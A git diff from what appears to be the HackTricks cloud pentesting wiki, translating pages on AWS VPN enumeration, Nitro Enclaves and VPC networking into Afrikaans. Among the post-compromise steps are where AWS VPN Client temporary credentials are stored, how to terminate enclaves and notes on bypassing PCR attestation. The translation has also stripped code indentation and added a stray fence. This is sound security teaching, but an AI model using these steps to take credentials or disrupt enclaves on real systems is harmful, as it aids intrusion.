+- Dit dien as 'n verwysingspunt vir die opstelling van die VPN-verbinding en veroorsaak geen addisionele koste nie.
+2. **Virtuele Privaat Gateway**:
+- 'n Virtuele Privaat Gateway (VPG) is die VPN-konsentrasie aan die Amazon kant van die Site-to-Site VPN-verbinding.
+- Dit is aan jou VPC geheg en dien as die teiken vir jou VPN-verbinding.
+- VPG is die AWS kant eindpunt vir die VPN-verbinding.
+- Dit hanteer die veilige kommunikasie tussen jou VPC en jou on-premises netwerk.
+3. **Site-to-Site VPN Verbinding**:
+- 'n Site-to-Site VPN-verbinding verbind jou on-premises netwerk met 'n VPC deur 'n veilige, IPsec VPN-tunnel.
+- Hierdie tipe verbinding vereis 'n Kliënt Gateway en 'n Virtuele Privaat Gateway.
+- Dit word gebruik vir veilige, stabiele, en konsekwente kommunikasie tussen jou datacentrum of netwerk en jou AWS-omgewing.
+- Gewoonlik gebruik vir gereelde, langtermynverbindinge en word gefaktureer op grond van die hoeveelheid data wat oor die verbinding oorgedra word.
+4. **Kliënt VPN Eindpunt**:
+- 'n Kliënt VPN eindpunt is 'n hulpbron wat jy in AWS skep om kliënt VPN-sessies te aktiveer en te bestuur.
+- Dit word gebruik om individuele toestelle (soos skootrekenaars, slimfone, ens.) veilig te laat aansluit op AWS-hulpbronne of jou on-premises netwerk.
+- Dit verskil van Site-to-Site VPN in die sin dat dit ontwerp is vir individuele kliënte eerder as om hele netwerke te verbind.
+- Met Kliënt VPN gebruik elke kliënttoestel 'n VPN-kliënt sagteware om 'n veilige verbinding te vestig.
 
-You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn).
+Jy kan [**meer inligting oor die voordele en komponente van AWS VPNs hier vind**](aws-vpc-and-networking-basic-information.md#vpn).
 
 ### Enumeration
-
 ```bash
 # VPN endpoints
 ## Check used subnetwork, authentication, SGs, connected...
@@ -300,31 +289,26 @@ aws ec2 describe-vpn-gateways
 # Get VPN site-to-site connections
 aws ec2 describe-vpn-connections
 ```
+### Plaaslike Enumerasie
 
-### Local Enumeration
+**Plaaslike Tydelike Kredensiale**
 
-**Local Temporary Credentials**
+Wanneer AWS VPN-kliënt gebruik word om met 'n VPN te verbind, sal die gebruiker gewoonlik **in AWS aanmeld** om toegang tot die VPN te verkry. Dan, word daar **AWS-kredensiale geskep en plaaslik gestoor** om die VPN-verbinding te vestig. Hierdie kredensiale word **gestoor in** `$HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt` en bevat 'n **AccessKey**, 'n **SecretKey** en 'n **Token**.
 
-When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**.
+Die kredensiale behoort aan die gebruiker `arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: navorsing oor die toestemmings van hierdie kredensiale).
 
-The credentials belong to the user `arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials).
+**opvn konfigurasie lêers**
 
-**opvn config files**
+As 'n **VPN-verbinding gevestig is**, moet jy soek na **`.opvn`** konfigurasie lêers in die stelsel. Boonop, een plek waar jy die **konfigurasies** kan vind is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`**
 
-If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`**
-
-#### **Post Exploitaiton**
+#### **Post Exploitatie**
 
 {{#ref}}
 ../../aws-post-exploitation/aws-vpn-post-exploitation.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
index 0575a17d8..604d75a66 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
@@ -4,19 +4,18 @@
 
 ## Basic Information
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro is 'n suite van **innovatiewe tegnologieë** wat die onderliggende platform vir AWS EC2-instanties vorm. Ingevoerd deur Amazon om **veiligheid, prestasie en betroubaarheid** te **verbeter**, benut Nitro op maat gemaakte **hardeware-komponente en 'n liggewig hypervisor**. Dit abstraheer baie van die tradisionele virtualisering funksionaliteit na toegewyde hardeware en sagteware, **minimaliseer die aanvaloppervlak** en verbeter hulpbron doeltreffendheid. Deur virtualisering funksies af te laai, laat Nitro EC2-instanties toe om **naby bare-metal prestasie** te lewer, wat dit veral voordelig maak vir hulpbron-intensiewe toepassings. Boonop verseker die Nitro Security Chip spesifiek die **veiligheid van die hardeware en firmware**, wat sy robuuste argitektuur verder versterk.
 
 ### Nitro Enclaves
 
-**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards.
+**AWS Nitro Enclaves** bied 'n veilige, **geïsoleerde rekenaaromgewing binne Amazon EC2-instanties**, spesifiek ontwerp vir die verwerking van hoogs sensitiewe data. Deur die AWS Nitro-stelsel te benut, verseker hierdie enclaves robuuste **isolasie en veiligheid**, ideaal vir **die hantering van vertroulike inligting** soos PII of finansiële rekords. Hulle beskik oor 'n minimalistiese omgewing, wat die risiko van data blootstelling aansienlik verminder. Boonop ondersteun Nitro Enclaves kriptografiese attestering, wat gebruikers in staat stel om te verifieer dat slegs geautoriseerde kode loop, wat van kardinale belang is vir die handhawing van streng nakoming en databeskermingsstandaarde.
 
 > [!CAUTION]
-> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not.
+> Nitro Enclave-beelde word **van binne EC2-instanties uitgevoer** en jy kan nie vanaf die AWS-webkonsol sien of 'n EC2-instantie beelde in Nitro Enclave uitvoer of nie.
 
 ## Nitro Enclave CLI installation
 
-Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones:
-
+Volg al die instruksies [**uit die dokumentasie**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). Hierdie is egter die belangrikste:
 ```bash
 # Install tools
 sudo amazon-linux-extras install aws-nitro-enclaves-cli -y
@@ -32,47 +31,39 @@ nitro-cli --version
 # Start and enable the Nitro Enclaves allocator service.
 sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
 ```
+## Nitro Enclave Beelde
 
-## Nitro Enclave Images
-
-The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like:
-
+Die beelde wat jy in Nitro Enclave kan hardloop, is gebaseer op docker beelde, so jy kan jou Nitro Enclave beelde van docker beelde soos:
 ```bash
 # You need to have the docker image accesible in your running local registry
 # Or indicate the full docker image URL to access the image
 nitro-cli build-enclave --docker-uri <docker-img>:<tag> --output-file nitro-img.eif
 ```
+Soos jy kan sien, gebruik die Nitro Enclave beelde die uitbreiding **`eif`** (Enclave Image File).
 
-As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File).
-
-The output will look similar to:
-
+Die uitvoer sal soortgelyk lyk aan:
 ```
 Using the locally available Docker image...
 Enclave Image successfully created.
 {
-  "Measurements": {
-    "HashAlgorithm": "Sha384 { ... }",
-    "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-    "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-    "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-  }
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
 }
 ```
-
 ### Run an Image
 
-As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file
-
+Soos per [**die dokumentasie**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), om 'n enclave beeld te laat loop, moet jy dit toewys met geheue van **ten minste 4 keer die grootte van die `eif` lêer**. Dit is moontlik om die standaard hulpbronne wat aan dit gegee moet word in die lêer te konfigureer.
 ```shell
 /etc/nitro_enclaves/allocator.yaml
 ```
-
 > [!CAUTION]
-> Always remember that you need to **reserve some resources for the parent EC2** instance also!
-
-After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with:
+> Onthou altyd dat jy **ook 'n paar hulpbronne vir die ouer EC2** instansie moet **bespreek**!
 
+Nadat jy die hulpbronne weet wat aan 'n beeld gegee moet word en selfs die konfigurasie-lêer gewysig het, is dit moontlik om 'n enklave-beeld te laat loop met:
 ```shell
 # Restart the service so the new default values apply
 sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
@@ -80,80 +71,72 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n
 # Indicate the CPUs and memory to give
 nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16
 ```
-
 ### Enumerate Enclaves
 
-If you compromise and EC2 host it's possible to get a list of running enclave images with:
-
+As jy 'n EC2-gasheer kompromitteer, is dit moontlik om 'n lys van hardloopende enklave-beelde te kry met:
 ```bash
 nitro-cli describe-enclaves
 ```
-
-It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with:
-
+Dit is **nie moontlik om 'n shell** binne 'n lopende enklave-beeld te kry nie, omdat dit die hoofdoel van die enklave is, egter, as jy die parameter **`--debug-mode`** gebruik, is dit moontlik om die **stdout** daarvan te kry met:
 ```shell
 ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID")
 nitro-cli console --enclave-id ${ENCLAVE_ID}
 ```
-
 ### Terminate Enclaves
 
-If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with:
-
+As 'n aanvaller 'n EC2-instantie kompromitteer, sal hy standaard nie in staat wees om 'n shell binne-in hulle te kry nie, maar hy sal in staat wees om hulle te **terminate** met:
 ```shell
 nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID}
 ```
-
 ## Vsocks
 
-The only way to communicate with an **enclave** running image is using **vsocks**.
+Die enigste manier om te kommunikeer met 'n **enclave** wat 'n beeld uitvoer, is deur **vsocks**.
 
-**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments.
+**Virtual Socket (vsock)** is 'n soketfamilie in Linux wat spesifiek ontwerp is om **kommunikasie** tussen virtuele masjiene (**VMs**) en hul **hypervisors**, of tussen VMs **selfs** te fasiliteer. Vsock stel doeltreffende, **bi-rigting kommunikasie** in staat sonder om op die gasheer se netwerkstapel te staatmaak. Dit maak dit moontlik vir VMs om te kommunikeer selfs sonder netwerk konfigurasies, **met 'n 32-bis Context ID (CID) en poortnommers** om verbindings te identifiseer en te bestuur. Die vsock API ondersteun beide stroom- en datagram soket tipes, soortgelyk aan TCP en UDP, wat 'n veelsydige hulpmiddel bied vir gebruikersvlak toepassings in virtuele omgewings.
 
 > [!TIP]
-> Therefore, an vsock address looks like this: `<CID>:<Port>`
+> Daarom lyk 'n vsock adres soos volg: `<CID>:<Port>`
 
-To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**:
+Om **CIDs** van die enclave wat beelde uitvoer te vind, kan jy eenvoudig die volgende cmd uitvoer en die **`EnclaveCID`** kry:
 
 <pre class="language-bash"><code class="lang-bash">nitro-cli describe-enclaves
 
 [
-  {
-    "EnclaveName": "secure-channel-example",
-    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
-    "ProcessID": 10131,
+{
+"EnclaveName": "secure-channel-example",
+"EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+"ProcessID": 10131,
 <strong>    "EnclaveCID": 16,
 </strong>    "NumberOfCPUs": 2,
-    "CPUIDs": [
-      1,
-      3
-    ],
-    "MemoryMiB": 1024,
-    "State": "RUNNING",
-    "Flags": "DEBUG_MODE",
-    "Measurements": {
-      "HashAlgorithm": "Sha384 { ... }",
-      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-    }
-  }
+"CPUIDs": [
+1,
+3
+],
+"MemoryMiB": 1024,
+"State": "RUNNING",
+"Flags": "DEBUG_MODE",
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
+}
 ]
 </code></pre>
 
 > [!WARNING]
-> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).
+> Let daarop dat daar vanaf die gasheer geen manier is om te weet of 'n CID enige poort blootstel nie! Tensy jy 'n **vsock poort skandeerder soos** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner) gebruik.
 
 ### Vsock Server/Listener
 
-Find here a couple of examples:
+Vind hier 'n paar voorbeelde:
 
 - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
 
 <details>
 
 <summary>Simple Python Listener</summary>
-
 ```python
 #!/usr/bin/env python3
 
@@ -173,30 +156,26 @@ s.listen()
 print(f"Connection opened by cid={remote_cid} port={remote_port}")
 
 while True:
-    buf = conn.recv(64)
-    if not buf:
-        break
+buf = conn.recv(64)
+if not buf:
+break
 
-    print(f"Received bytes: {buf}")
+print(f"Received bytes: {buf}")
 ```
-
 </details>
-
 ```bash
 # Using socat
 socat VSOCK-LISTEN:<port>,fork EXEC:"echo Hello from server!"
 ```
+### Vsock Kliënt
 
-### Vsock Client
-
-Examples:
+Voorbeelde:
 
 - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
 
 <details>
 
-<summary>Simple Python Client</summary>
-
+<summary>Simpele Python Kliënt</summary>
 ```python
 #!/usr/bin/env python3
 
@@ -212,64 +191,53 @@ s.connect((CID, PORT))
 s.sendall(b"Hello, world!")
 s.close()
 ```
-
+```markdown
 </details>
-
+```
 ```bash
 # Using socat
 echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000
 ```
-
 ### Vsock Proxy
 
-The tool vsock-proxy allows to proxy a vsock proxy with another address, for example:
-
+Die hulpmiddel vsock-proxy stel in staat om 'n vsock-proxy met 'n ander adres te proxy, byvoorbeeld:
 ```bash
 vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml
 ```
-
-This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`:
-
+Dit sal die **lokale poort 8001 in vsock** na `ip-ranges.amazonaws.com:443` stuur en die lêer **`your-vsock-proxy.yaml`** mag hierdie inhoud hê wat toegang tot `ip-ranges.amazonaws.com:443` toelaat:
 ```yaml
 allowlist:
-  - { address: ip-ranges.amazonaws.com, port: 443 }
+- { address: ip-ranges.amazonaws.com, port: 443 }
 ```
-
-It's possible to see the vsock addresses (**`<CID>:<Port>`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port):
-
+Dit is moontlik om die vsock adresse (**`<CID>:<Port>`**) wat deur die EC2 gasheer gebruik word te sien met (let op die `3:8001`, 3 is die CID en 8001 die poort):
 ```bash
 sudo ss -l -p -n | grep v_str
 v_str LISTEN 0      0                                                                              3:8001                   *:*     users:(("vsock-proxy",pid=9458,fd=3))
 ```
-
 ## Nitro Enclave Atestation & KMS
 
-The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF.
+Die Nitro Enclaves SDK laat 'n enclave toe om 'n **kriptografies geskrewe atestering dokument** van die Nitro **Hypervisor** aan te vra, wat **unieke metings** spesifiek vir daardie enclave insluit. Hierdie metings, wat **hashes en platform konfigurasie registers (PCRs)** insluit, word tydens die atestering proses gebruik om die **identiteit van die enclave te bewys** en **vertroue met eksterne dienste te bou**. Die atestering dokument bevat tipies waardes soos PCR0, PCR1, en PCR2, wat jy voorheen teëgekom het toe jy 'n enclave EIF gebou en gestoor het.
 
-From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values:
+Van die [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), is dit die PCR waardes:
 
-<table><thead><tr><th width="97">PCR</th><th width="221">Hash of ...</th><th>Description</th></tr></thead><tbody><tr><td>PCR0</td><td>Enclave image file</td><td>A contiguous measure of the contents of the image file, without the section data.</td></tr><tr><td>PCR1</td><td>Linux kernel and bootstrap</td><td>A contiguous measurement of the kernel and boot ramfs data.</td></tr><tr><td>PCR2</td><td>Application</td><td>A contiguous, in-order measurement of the user applications, without the boot ramfs.</td></tr><tr><td>PCR3</td><td>IAM role assigned to the parent instance</td><td>A contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.</td></tr><tr><td>PCR4</td><td>Instance ID of the parent instance</td><td>A contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.</td></tr><tr><td>PCR8</td><td>Enclave image file signing certificate</td><td>A measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.</td></tr></tbody></table>
+<table><thead><tr><th width="97">PCR</th><th width="221">Hash van ...</th><th>Beskrywing</th></tr></thead><tbody><tr><td>PCR0</td><td>Enclave beeld lêer</td><td>‘n Aaneengeskakelde meting van die inhoud van die beeld lêer, sonder die afdeling data.</td></tr><tr><td>PCR1</td><td>Linux kern en bootstrap</td><td>‘n Aaneengeskakelde meting van die kern en boot ramfs data.</td></tr><tr><td>PCR2</td><td>Toepassing</td><td>‘n Aaneengeskakelde, in-volgorde meting van die gebruiker toepassings, sonder die boot ramfs.</td></tr><tr><td>PCR3</td><td>IAM rol toegeken aan die ouer instansie</td><td>‘n Aaneengeskakelde meting van die IAM rol toegeken aan die ouer instansie. Verseker dat die atestering proses slegs slaag wanneer die ouer instansie die korrekte IAM rol het.</td></tr><tr><td>PCR4</td><td>Instansie ID van die ouer instansie</td><td>‘n Aaneengeskakelde meting van die ID van die ouer instansie. Verseker dat die atestering proses slegs slaag wanneer die ouer instansie 'n spesifieke instansie ID het.</td></tr><tr><td>PCR8</td><td>Enclave beeld lêer onderteken sertifikaat</td><td>‘n Meting van die onderteken sertifikaat gespesifiseer vir die enclave beeld lêer. Verseker dat die atestering proses slegs slaag wanneer die enclave vanaf 'n enclave beeld lêer onderteken deur 'n spesifieke sertifikaat geboot is.</td></tr></tbody></table>
 
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**.
+Jy kan **kripto-grafiese atestering** in jou toepassings integreer en gebruik maak van voorafgeboude integrasies met dienste soos **AWS KMS**. AWS KMS kan **enclave atesterings valideer** en bied atestering-gebaseerde voorwaardesleutels (`kms:RecipientAttestation:ImageSha384` en `kms:RecipientAttestation:PCR`) in sy sleutelsbeleid. Hierdie beleid verseker dat AWS KMS operasies met die KMS sleutel **slegs toelaat as die enclave se atestering dokument geldig is** en aan die **gespesifiseerde voorwaardes** voldoen.
 
 > [!TIP]
-> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail.
+> Let daarop dat Enclaves in debug (--debug) modus atestering dokumente genereer met PCRs wat uit nulles bestaan (`000000000000000000000000000000000000000000000000`). Daarom sal KMS beleid wat hierdie waardes nagaan misluk.
 
 ### PCR Bypass
 
-From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement).
+Van 'n aanvaller se perspektief, let daarop dat sommige PCRs dit moontlik maak om sekere dele of die hele enclave beeld te wysig en steeds geldig te wees (byvoorbeeld PCR4 kyk net na die ID van die ouer instansie, so om enige enclave beeld in daardie EC2 te draai sal hierdie potensiële PCR vereiste vervul).
 
-Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections.
+Daarom mag 'n aanvaller wat die EC2 instansie kompromitteer in staat wees om ander enclave beelde te draai om hierdie beskermings te omseil.
 
-The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO.
+Die navorsing oor hoe om nuwe beelde te wysig/te skep om elke beskerming te omseil (veral die nie so voor die hand liggende) is steeds TODO.
 
 ## References
 
 - [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0)
-- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
+- Alle dele van die Nitro tutoriaal van AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
index 03277bfd1..4b461f842 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
@@ -4,37 +4,37 @@
 
 ## AWS Networking in a Nutshell
 
-A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**).
+'n **VPC** bevat 'n **netwerk CIDR** soos 10.0.0.0/16 (met sy **routeringstabel** en **netwerk ACL**).
 
-This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**.
+Hierdie VPC-netwerk is verdeel in **subnetwerke**, so 'n **subnetwerk** is direk **verwant** aan die **VPC**, **routering** **tabel** en **netwerk ACL**.
 
-Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**.
+Dan is **Netwerkinterfaces** wat aan dienste (soos EC2-instansies) geheg is, **verbonden** met die **subnetwerke** met **veiligheidsgroep(e)**.
 
-Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**.
+Daarom sal 'n **veiligheidsgroep** die blootgestelde poorte van die netwerk **interfaces wat dit gebruik**, **onafhanklik van die subnetwork** beperk. En 'n **netwerk ACL** sal die blootgestelde poorte tot die **hele netwerk** **beperk**.
 
-Moreover, in order to **access Internet**, there are some interesting configurations to check:
+Boonop, om **toegang tot die internet** te verkry, is daar 'n paar interessante konfigurasies om na te kyk:
 
-- A **subnetwork** can **auto-assign public IPv4 addresses**
-- An **instance** created in the network that **auto-assign IPv4 addresses can get one**
-- An **Internet gateway** need to be **attached** to the **VPC**
-  - You could also use **Egress-only internet gateways**
-- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**.
-  - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs)
+- 'n **subnetwerk** kan **outomaties openbare IPv4-adresse toewys**
+- 'n **instansie** wat in die netwerk geskep is wat **outomaties IPv4-adresse toewys, kan een kry**
+- 'n **Internet-gateway** moet aan die **VPC** **geheg** wees
+- Jy kan ook **Egress-only internet gateways** gebruik
+- Jy kan ook 'n **NAT-gateway** in 'n **privaat subnet** hê sodat dit moontlik is om **verbinding te maak met eksterne dienste** vanaf daardie privaat subnet, maar dit is **nie moontlik om hulle van buite te bereik** nie.
+- Die NAT-gateway kan **publiek** wees (toegang tot die internet) of **privaat** (toegang tot ander VPCs)
 
 ![](<../../../../images/image (274).png>)
 
 ## VPC
 
-Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs...
+Amazon **Virtual Private Cloud** (Amazon VPC) stel jou in staat om **AWS-hulpbronne in 'n virtuele netwerk** te begin wat jy gedefinieer het. Hierdie virtuele netwerk sal verskeie subnetwerke, Internet-gateways om toegang tot die internet te verkry, ACLs, Veiligheidsgroepe, IP's hê...
 
 ### Subnets
 
-Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.
+Subnetwerke help om 'n groter vlak van sekuriteit af te dwing. **Logiese groepe van soortgelyke hulpbronne** help jou ook om 'n **gemaklike bestuur** oor jou infrastruktuur te handhaaf.
 
-- Valid CIDR are from a /16 netmask to a /28 netmask.
